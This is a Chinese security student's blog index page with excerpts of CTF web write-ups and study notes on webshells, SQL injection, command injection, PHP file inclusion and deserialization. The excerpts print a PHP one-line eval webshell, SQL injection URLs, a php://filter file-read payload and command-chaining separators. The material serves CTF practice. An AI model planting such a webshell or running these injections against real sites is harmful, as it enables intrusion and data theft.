
Web
文章平均质量分 78
lunan0320
网络空间安全专业在读,博客主要用于记录学习中的一些有趣的东西
涉及比较广泛:安全、CTF、开发、密码学、刷题心得、体系结构等
Welcome to the blog of lunan~
展开
-
木马getshell
getshell:3步控制目标服务器文章目录**getshell:3步控制目标服务器**1、什么是Web-shell?2、木马3、**什么是后门?****4、文件解析漏洞****5、制作图片马**1、什么是Web-shell?web 的含义显然是需要服务器开放web服务shell 是一个人机交互页面拿 shell”的含义是取得对服务器/电脑某种程度上的操作权限。webshell拿到网站服务器的权限(shell)。webshell就是以asp、php、jsp或者cgi等网页文件形式存在的命原创 2021-05-16 19:10:41 · 864 阅读 · 0 评论 -
MySQL学习笔记
MySQL学习笔记SQL: Structure Quevy Language (结构化查询语言)文章目录MySQL学习笔记SQL: Structure Quevy Language (结构化查询语言)一、基本知识DDL:数据定义语言1、登录方式2、数据类型3、字符串类型4、日期和时间类型二、数据表操作1、建立数据表2、显示表结构3、插入数据三、查询语句1、基础查询语句2、模糊查询四、排序1、基础排序2、聚合函数3、分组查询五、数据完整性1、实体完整性1.1主键约束primary key1.2唯一约束2原创 2021-05-15 21:29:52 · 313 阅读 · 4 评论 -
BUUCTF-[GXYCTF2019] Ping Ping Ping
BUUCTF-[GXYCTF2019] Ping Ping Ping考点:1、命令联合执行2、命令绕过空格的方法3、内联执行一、命令联合执行; 前面的执行完执行后面的| 管道符,上一条命令的输出,作为下一条命令的参数(显示后面的执行结果)|| 当前面的执行出错时(为假)执行后面的& 将任务置于后台执行&& 前面的语句为假则直接出错,后面的也不执行,前面只能为真%0a (换行)%0d (回车)二、命令绕过空格的方法原创 2021-05-15 21:15:47 · 1145 阅读 · 0 评论 -
LoveSQL
LoveSQL(SQL注入详解)1、根据题目,显然想到的是sql注入漏洞,直接尝试万能密码2、此时url构造,查看字段数/check.php?username=admin' order by 3%23&password=1 # 存在/check.php?username=admin' order by 4%23&password=1 # 报错因此,得到总共有三个字段数注意:url中不能用#,应该用url编码%233、用union来查询测试注入点,查看回显点原创 2021-05-15 21:12:01 · 1358 阅读 · 0 评论 -
[极客大挑战 2019]Secret File
[极客大挑战 2019]Secret File一、考点前端中背景可以覆盖内容,页面源代码可以查看完整的html在php文件中可以写入html代码,html可在前端展示出来,php代码主要是处理数据,通常不会展示。文件包含漏洞,PHP伪协议获取文件php://filter 是一种元封装器, 设计用于数据流打开时的筛选过滤应用。 这对于一体式(all-in-one)的文件函数非常有用,类似 readfile()、 file() 和 file_get_contents(), 在数据流内容读取之前没有原创 2021-05-15 21:08:41 · 276 阅读 · 0 评论 -
RoarCTF2019 Calc
RoarCTF2019 Calc一、知识点1.1PHP的字符串解析特性这是别人对PHP字符串解析漏洞的理解,我们知道PHP将查询字符串(在URL或正文中)转换为内部GET或的关联数组_GET或的关联数组GET或的关联数组_POST。例如:/?foo=bar变成Array([foo] => “bar”)。值得注意的是,查询字符串在解析的过程中会将某些字符删除或用下划线代替。例如,/?%20news[id%00=42会转换为Array([news_id] => 42)。如果一个IDS/原创 2021-05-15 21:06:25 · 174 阅读 · 0 评论 -
PHP序列化与反序列化
PHP序列化与反序列化参考文献:浅谈反序列漏洞1、目录扫描,使用目录扫描工具dirsearch,扫出来一个www.zip的文件,download。python dirsearch.py -u http://fd524dc7-eca6-4d21-b9c6-f168d37e3951.node3.buuoj.cn/ -e * -w db/dir.txt2、查看flag.php,发现是个假的flag,因此查看index.php,查看其中的php代码,发现是文件包含的时候,进行了反序列化的过程,传入一个se原创 2021-05-15 21:03:56 · 353 阅读 · 0 评论 -
BackFile备份文件
BackFile备份文件一、知识点1、目录扫描工具dirsearch使用 dirsearch的文件位置然后执行py dirsearch.py -u url地址 -e*py dirsearch.py -u http://60266509-e2a1-464e-81c2-f09a0a591b0f.node3.buuoj.cn -e*2、常用备份文件后缀名备份文件一般的后缀名为.rar.zip.7z.tar.gz.bak.swp.txt.html.bak.git .svn .原创 2021-05-15 21:00:23 · 820 阅读 · 0 评论 -
BuyFlag抓包绕过
BuyFlag抓包绕过一、知识点1、burpsuite抓包2、post方式修改参数3、cookie篡改提交4、科学计数法二、解题过程1、打开网页,然后发现menu中有个buyflag的连接,点进去2、查看源码php代码 提示我们需要是CUIT的学生 post方式提交password和money 查看代码发现是php弱类型的考点,那么直接让password=404a即可3、burp抓包修改参数 修改了参数之后,发现user的地方cookie也需要修改 0是false,原创 2021-05-15 20:57:42 · 403 阅读 · 0 评论 -
BUUCTF-[ZJCTF 2019]NiZhuanSiWei
BUUCTF-[ZJCTF 2019]NiZhuanSiWei一、知识点1、php各种协议,data://,php://payload构造:text=data://text/plain,welcome to the zjctfdata协议解释:https://www.php.net/manual/zh/wrappers.data.php2、文件包含payload构造:file=php://filter/read=convert.base64-encode/resource=useless.原创 2021-05-15 20:55:27 · 500 阅读 · 0 评论 -
[护网杯 2018]easy_tornado WriteUp(超级详细!)
[护网杯 2018]easy_tornado 打开题目后,首先发现3个超链接 依次点开三个链接 网址里有参数filename和filehash推测这里flag应该是filename=/fllllllllllllag&filehash=md5(cookie_secret+md5(filename))里面,filehash里hash就是提示为md5的hash加密。 变量 filename 的值总是为要访问的文件,再根据提示三和 fil原创 2021-04-22 21:08:43 · 4055 阅读 · 1 评论 -
[ACTF2020 新生赛]Include WriteUp(超级详细)
[ACTF2020 新生赛]Include 打开靶机发现一个超链接,点击之后出现一段话“Can you find out the flag?”查看源码注入,无果仔细看url,发现有flag.php 根据题目提示,该题应该是文件包含漏洞,因此可以判断出此题是PHP伪协议题目,构造payload如下?file=php://filter/read=convert.base64-encode/resource=flag.php 此时可以得到base64的编吗后的原创 2021-04-22 20:55:45 · 2243 阅读 · 1 评论 -
[HCTF 2018]WarmUp WriteUp(超级详细)
HCTF 2018:WarmUp题目来源:BUUCTF首先打开题目,url查找index.php时发现了一张滑稽的图片,此时查看源码发现source.php文件,直接访问得到界面源码。 显然需要我们进行代码审计,分析源码。 <?php highlight_file(__FILE__); class emmm { public static function checkFile(&$page) //传原创 2021-04-22 20:45:50 · 4396 阅读 · 5 评论 -
文件上传&文件包含漏洞
一句话木马的书写格式<?php @eval($_POST["myshell"]) ?>正则过滤egrep -R 'eval\(\$_POST\[' /var/www/dvwa-R是表示正则展开,egrep表示调用正则表达式,/var是路径自定义过滤fgrep -R 'eval($_POST[' /var/wwwfgrep表示自定义格式过滤连接远程主机ssh 192.168.13.135...原创 2021-04-22 00:33:21 · 547 阅读 · 3 评论